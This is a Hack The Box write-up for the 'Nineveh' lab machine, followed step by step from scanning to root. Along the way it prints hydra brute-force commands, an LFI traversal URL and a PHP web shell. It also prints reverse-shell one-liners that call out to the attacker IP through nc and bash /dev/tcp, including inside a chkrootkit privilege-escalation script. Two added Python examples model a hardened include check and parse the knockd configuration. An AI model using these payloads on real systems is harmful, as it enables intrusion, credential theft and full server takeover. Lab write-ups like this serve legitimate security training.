Basic information

Port scan

Ports 80 and 443:

$ nmap -sC -sV 10.10.10.43
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-17 13:41 CST
Nmap scan report for 10.10.10.43
Host is up (0.071s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
443/tcp open ssl/http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=nineveh.htb/organizationName=HackTheBox Ltd/stateOrProvinceName=Athens/countryName=GR
| Not valid before: 2017-07-01T15:03:30
|_Not valid after: 2018-07-01T15:03:30
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 82.95 seconds

80

Apache default page:

443

An image.

Directory scan

80

Port 80 has a department directory that requires login, and info.php is just phpinfo:

➜  ~ gobuster dir -u http://10.10.10.43/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt  -x php,html,txt -t 50

/index.html (Status: 200)
/info.php (Status: 200)
/department (Status: 301)
/server-status (Status: 403)

443

Port 443 has db, secure_notes and other directories:

gobuster dir -u https://10.10.10.43/ -k -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt  -x php,html,txt -t 50

/index.html (Status: 200)
/db (Status: 301)
/server-status (Status: 403)
/secure_notes (Status: 301)

phpLiteAdmin

db is phpLiteAdmin v1.9:

Related vulnerabilities can be found for it:

But logging in is a prerequisite.

secure_notes

secure_notes contains a very large image:

Running strings on it directly shows a lot of hidden content, including an SSH private key; the SSH port is not exposed yet, so save it for later:

Password brute-forcing

The phpLiteAdmin and department passwords can be brute-forced:

hydra -l none -P /usr/share/wordlists/rockyou.txt 10.10.10.43 https-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect password" -t 64 -V
[443][http-post-form] host: 10.10.10.43 login: none password: password123

hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.43 http-post-form "/department/login.php:username=^USER^&password=^PASS^:Invalid" -t 64 -V
[80][http-post-form] host: 10.10.10.43 login: admin password: 1q2w3e4r5t

LFI

The notes parameter in department has an LFI; after several attempts it turns out the filename must contain ninevehNotes.txt for the file to be included:

http://10.10.10.43/department/manage.php?notes=files/ninevehNotes.txt*/../../../../../../etc/passwd
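As an added illustration (not code from the original writeup or from the box), here is a Python model of the two ways that include check could be written: the substring filter the writeup ran into, next to an allowlist that decides by where the resolved path ends up rather than by what it is called. The base directory /var/www/html/department and the function names are assumptions made for the example.

```python
import posixpath

# Assumed for this example: the directory manage.php is meant to serve notes from.
NOTES_DIR = "/var/www/html/department"


def weak_check(notes):
    """The filter the writeup ran into: accept the request whenever
    'ninevehNotes.txt' appears anywhere in the parameter. A traversal
    payload that merely contains that string passes."""
    return "ninevehNotes.txt" in notes


def hardened_check(notes, base_dir=NOTES_DIR):
    """Allowlist by location instead of by name: resolve the parameter
    relative to base_dir and require the result to stay inside it.
    Absolute paths, '..' escapes and embedded NUL bytes are all rejected.
    This is purely lexical (posixpath.normpath) so it runs without the
    files existing; on a live server use os.path.realpath as well, so that
    symlinks inside base_dir cannot point back out of it."""
    if "\x00" in notes or notes.startswith("/"):
        return False
    resolved = posixpath.normpath(posixpath.join(base_dir, notes))
    return resolved == base_dir or resolved.startswith(base_dir + "/")


def evaluate(samples):
    """Run both checks over a list of parameter values and return
    {value: (weak_result, hardened_result)}."""
    return {s: (weak_check(s), hardened_check(s)) for s in samples}


if __name__ == "__main__":
    # Constructed inputs: the legitimate note, the traversal from the writeup,
    # and the absolute path the writeup later includes from /var/tmp.
    samples = [
        "files/ninevehNotes.txt",
        "files/ninevehNotes.txt*/../../../../../../etc/passwd",
        "/var/tmp/ninevehNotes.txt.php",
    ]
    for value, (weak, hard) in evaluate(samples).items():
        print(f"{value:60} weak={weak} hardened={hard}")
```

Only the legitimate note passes the hardened check; both the traversal and the absolute /var/tmp path are rejected, because neither resolves to a location under the notes directory.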

webshell

We also have phpLiteAdmin from earlier, which can be used to write a PHP file: put PHP code in the database table name, rename the database, and then include it through the LFI:

<?php system($_REQUEST["miao"]);?>

/var/tmp/ninevehNotes.txt.php

http://10.10.10.43/department/manage.php?notes=/var/tmp/ninevehNotes.txt.php&miao=whoami

reverse shell

http://10.10.10.43/department/manage.php?notes=/var/tmp/ninevehNotes.txt.php&miao=rm%20/tmp/f;mkfifo%20/tmp/f;cat%20/tmp/f|/bin/sh%20-i%202%3E%261|nc%2010.10.14.3%204444%20%3E/tmp/f

knock

Looking at the process list reveals a knockd:

Searching shows it is used to hide SSH: you have to knock before SSH is reachable:

So we can read its config file directly and get the knock sequence:

$ cat /etc/knockd.conf
[options]
logfile = /var/log/knockd.log
interface = ens160

[openSSH]
sequence = 571, 290, 911
seq_timeout = 5
start_command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
tcpflags = syn

[closeSSH]
sequence = 911,290,571
seq_timeout = 5
start_command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
tcpflags = syn
$ ls /home
amrois
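Added example, not from the original writeup: a small Python parser for the knockd.conf format that pulls out each section's sequence, timeout and start command, using the configuration above as its input. The per-port ":udp"/":tcp" suffix handling follows the knockd.conf syntax; the helper names are my own.

```python
import configparser

# The knockd.conf recovered above, embedded here so the example runs offline.
KNOCKD_CONF = """\
[options]
logfile = /var/log/knockd.log
interface = ens160

[openSSH]
sequence = 571, 290, 911
seq_timeout = 5
start_command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
tcpflags = syn

[closeSSH]
sequence = 911,290,571
seq_timeout = 5
start_command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
tcpflags = syn
"""


def parse_knockd_conf(text):
    # interpolation=None: knockd's %IP% placeholder would otherwise be read
    # as a configparser interpolation token and raise on access.
    parser = configparser.ConfigParser(interpolation=None)
    parser.read_string(text)
    return parser


def parse_sequence(value):
    """'571, 290, 911' or '7000:udp,8000:tcp' -> [(port, proto), ...].
    knockd treats a port without a suffix as tcp."""
    result = []
    for item in value.split(","):
        item = item.strip()
        if not item:
            continue
        port, _, proto = item.partition(":")
        result.append((int(port), proto.lower() or "tcp"))
    return result


def knock_sequences(text):
    """Map every knock section (everything except [options]) to its parsed
    sequence, timeout and the command knockd runs once the sequence is seen."""
    parser = parse_knockd_conf(text)
    sections = {}
    for name in parser.sections():
        if name == "options":
            continue
        sec = parser[name]
        sections[name] = {
            "sequence": parse_sequence(sec.get("sequence", "")),
            "seq_timeout": int(sec.get("seq_timeout", "0")),
            "start_command": sec.get("start_command", ""),
        }
    return sections


if __name__ == "__main__":
    for name, info in knock_sequences(KNOCKD_CONF).items():
        ports = " ".join(f"{p}/{proto}" for p, proto in info["sequence"])
        print(f"[{name}] {ports} within {info['seq_timeout']}s -> {info['start_command']}")
```

The parser makes the two points of this step explicit: the open and close sequences are each other's reverse, and the start command only inserts an iptables rule for the knocking source IP, which is why SSH stayed filtered in the initial nmap scan.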

knock & ssh & user flag

sudo apt-get install knockd
knock 10.10.10.43 571 290 911
# can also be done with nmap
for x in 571 290 911; do nmap -Pn --host_timeout 201 --max-retries 0 -p $x 10.10.10.43; done

chmod 600 nineveh.priv
ssh -i nineveh.priv amrois@10.10.10.43

chkrootkit

Running something like pspy shows that /usr/bin/chkrootkit runs on a schedule, and chkrootkit has a known local privilege escalation vulnerability:

Privilege escalation & root flag

Write an update file under tmp and wait for it to be triggered:

#!/bin/bash
bash -i >& /dev/tcp/10.10.14.3/4445 0>&1
